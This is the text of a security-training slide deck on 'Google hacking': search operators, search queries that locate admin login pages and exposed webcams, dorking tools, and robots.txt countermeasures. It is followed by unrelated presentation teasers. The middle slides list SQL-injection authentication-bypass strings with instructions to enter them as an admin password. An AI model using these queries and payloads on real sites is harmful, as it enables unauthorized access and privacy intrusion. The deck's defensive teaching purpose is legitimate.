Google and Beyond: Advanced Search Engine Hacking and

Google and Beyond: Advanced Search Engine Hacking and

Google and Beyond: Advanced Search Engine Hacking and Web-Based Intelligence Gathering By Manish Kumar Founder & CEO, Rooman Technologies Pvt Ltd AGENDA

How Google works Information disclosure with Google Tools Countermeasures Google Hacking Web Hacking: Pick a site, find the vulnerability Google Hacking :

Pick a vulnerability, find the site. Dont Be A Target of Opportunity How Google Works Googlebot, a web crawler that finds and fetches web pages. The indexer

that sorts every word on every page and stores the resulting index of words in a huge database. The query processor which compares your search query to the index and recommends the documents

that it considers most relevant. How Google Works SERVER SIDE CLIENT SIDE How Googlebot Works

Googlebot finds pages in two ways through an add URL form, www.google.com/addurl.htm l through finding links by crawling the web.

Indexer and Query Processor Indexer Googlebot gives the indexer the full text of the pages it finds. These pages are stored in Googles index database in alphabetic order.

each index entry store a list of documents in which the term appears and the location within the text where it occurs. Query Processor Page Ranking puts more important pages at high

rank. Intelligent Technique for learning relationships and associations within the stored data Spelling Correcting System So What Determines Page

Relevance and Rating? Exact Phrase: are your keywords found as an exact phrase in any pages? Adjacency: how close are your keywords to each other?

Weighting: how many times do the keywords appear in the page? PageRank/Links: How many links point to the page? How many links are actually in the page.

Equation: (Exact Phrase Hit)+(AdjacencyFactor)+(Weight) * (PageRank/Links) The Basics To set the stage for what I will demo, it is necessary to understand some of Googles advanced search functions. This will not be an exhaustive list, just an intro. Creative use of these functions is the key to successful Google Hacking.

The Basics Some important things to keep in mind Google queries are not case sensitive. The * wildcard represents any word Example: * insurance quote Google stems words automatically Example: automobile insurance quote brings up sites

with auto . The Basics The + symbol forces inclusion of a certain word. auto insurance +progressive The - symbol forces exclusion of a certain word. (Site:progressive.com site:www.progressive.com)

The | symbol provides boolean OR logic. auto insurance + inurl:(progressive | geico) Information Disclosure with Google Advanced Search Operators site: (.edu, .gov, foundstone.com, usc.edu) filetype: (txt, xls, mdb, pdf, .log) Daterange: (julian date format) Intitle / allintitle

Inurl / allinurl Advanced Operators link:URL = lists other pages that link to the URL. related:URL = lists other pages that are related to the URL. site:domain.com search term = restricts search results to the given domain. allinurl:WORDS = shows only pages with all search terms in the url.

inurl:WORD = like allinurl: but filters the URL based on the first term only. allintitle:WORD = shows only results with terms in title. intitle:WORD = similar to allintitle, but only for the next word. cache:URL = will show the Google cached version of the URL. The Basics Lets take a look at a few of the interesting

Google search commands. The Basics There are many more advanced operators. Combining these creatively is the key to Google Hacking. http://www.googleguide.com/advanced_oper ators_reference.html BUT DO YOU REALLY NEED TO REMEMBER IT

Advanced Search with Google INTERESTING SEARCHES Now that weve gotten this boring stuff out of the way, lets introduce some Google hacks. Google and Proxy

Use www.google.com/translate_t to by-pass Internet Browser Security Settings. Find a proxy that works, and enter in the URL inurl:nph-proxy.cgi start using cgiproxy inurl:nph-proxy.cgi Start browsing through this CGI-based proxy Gaining auth bypass on an admin account

There is a large number of google dork for basic sql injection

"inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp"

"inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp" SQL Injection

' or '1'='1 ' or 'x'='x ' or 0=0 -" or 0=0 -or 0=0 -' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1--

Keep the username as "Admin and for password type one of the following

" or 1=1-or 1=1-' or a=a-" or "a"="a ') or ('a'='a ") or ("a"="a

hi" or "a"="a hi" or 1=1 -hi' or 1=1 blah 'or'1=1' Few more interesting Searches Browsing images of the site Site: xxxxxxx in Google image

Browse Live Video Cameras inurl:viewerframe?mode=motion (http://202.212.193.26:555/ViewerFrame?Mode=Motion&Language=0) Intitle:Live View / - AXIS Browse Open Webcams Worldwide Axis Webcams: inurl:/view.shtml or inurl:view/index.shtml Cannon Webcams: sample/LvAppl/

Server versioning intitle:index.of server at Tools Google Hacks Goolag Site Scanner Site Digger Gooscan

Goolink Scanner Athena GOOGLE HACK Google Hacks is a compilation of carefully crafted Google searches that expose novel functionality from Google's search and map services You can use it to view a timeline of your search results, view a map, search for music, search for

books, and perform many other specific kinds of searches You can also use this program to use google as a proxy GOOGLE HACK SCREEN SHOT GOOLAG SCANNER Goolag Scanner enables everyone to audit his/

her own web site via Google It uses one xml-based configuration file for its settings Screenshot of GOOLAG SCANNER SITEDIGGER Automated Google hacking tool from Foundstone

Uses Google API Uses Google Hacking Database SiteDigger searches Googles cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on websites Screen shot of SITE DIGGER Countermeasures

Keep sensitive data off the web!! Do not display detailed Error Message Do not allow Directory Browsing

Perform periodic Google Assessments Update robots.txt (For examples and suggestions for using a robots.txt file, see http://www.robotstxt.org) Use meta-tags: NOARCHIVE http://www.google.com/remove.html. This is bad! How To Protect Your Websites From

Google Hackers Use a robots.txt file to prevent Google and other search engines from crawling your site if it shouldnt be crawled. ROBOTS.TXT Example This example allows all robots to visit all files because the wildcard "*" specifies all robots:

User-agent: * Disallow: This example keeps all robots out: User-agent: * Disallow: / The next is an example that tells all crawlers not to enter four directories of a website: User-agent: * Disallow: /cgi-bin/ Disallow: /images/ Disallow: /tmp/

Disallow: /private/ Robots.txt Cont.. Example that tells a specific crawler not to enter one specific directory: User-agent: BadBot # replace the 'BadBot' with the actual user-agent of the bot Disallow: /private/

Example that tells all crawlers not to enter one specific file: User-agent: * Disallow: /directory/file.html Note that all other files in the specified directory will be processed. Example demonstrating how comments can be used: # Comments appear after the "#" symbol at the start of a line, or after a directive User-agent: * # match all bots Disallow: / # keep them out

Few interesting Websites www.archive.org Archive of websites (Time Machine) www.readnotify.com Find out when your email gets read, Retract, Certify, Track & much more

www.guerrillamail.com (provides you with disposable e-mail addresses which expire after 15 Minutes. www.gorillaemail.com Email Marketing solutions that allows you to Send, Track and Confirm delivery of Emails, Newsletters, Events etc. QUESTIONS ????

THANK YOU Manish Kumar, CEO, Rooman Technologies Email: [email protected] Ph: 080-40445566

Recently Viewed Presentations

  • The Elements and Principles of Art

    The Elements and Principles of Art

    Elements and Principles of Art and Design "The building blocks and how we use them" CONTRAST Deals with the difference of the art elements used Black versus white Orange versus blue (complementary colors); warm versus cool colors UNITY and HARMONY...
  • Cryptography and Secret Codes - University of Arizona

    Cryptography and Secret Codes - University of Arizona

    Cryptography and Secret Codes. or one reason that linear equations are cool. ... The rule we came up with "Change it to a number and add 3" is a linear code. It is more easily written with the linear equation...
  • Development of PRO Content Steven Blum Director, Patient

    Development of PRO Content Steven Blum Director, Patient

    The content of a PRO is developed through qualitative research to elicit key concepts of disease experience and impact from patients representing the target population. ... Original Item, Examples of Issues from Interviews, Revised Item, Rationale.
  • Chapter 37

    Chapter 37

    Chapter 37. Care of Patients with Cardiac Problems. Heart Failure. ... The most reliable criteria for diagnosing endocarditis include positive blood cultures, a new regurgitant murmur, and evidence of endocardial involvement by echocardiography.
  • Immanuel Kant - Bridgewater State University

    Immanuel Kant - Bridgewater State University

    Kant: Groundwork for the Metaphysics of Morals. 18th-Century German philosopher. Worked on metaphysics, epistemology, ethics, and aesthetics. The Good Will. Nothing is an unqualified good except a good will. The Good Will. Nothing is an unqualified good except a good...
  • Welcome to 5th grade Curriculum Night  Reach full

    Welcome to 5th grade Curriculum Night Reach full

    Geography History Economics Civics 4-H Oratorical Contest Spelling Bee Field Trip End of the year "Celebration" Science Fair Math Counts Reading Bowl Welcome to 5th grade Curriculum Night Reach full potential Meet individual needs Teach all Standards and Benchmarks set...
  • Verbs like GUSTAR - Birmingham Schools

    Verbs like GUSTAR - Birmingham Schools

    We only use the following forms of the verb: Me gusta(n) Nos gusta(n) Te gusta(n) Os gusta(n) Le gusta(n) Les gusta(n) **Remember that me, te, le, nos, os, and les are Indirect Object Pronouns Other verbs like GUSTAR The following...
  • 1930s & the Great Depression

    1930s & the Great Depression

    MarketCauses of the Depression. Stock Market. Buying on . margin & stock speculation. Selling at a loss. Bank closings. Imagine losing all of your money in the blink of an eye. Imagine going to the bank to get your money,...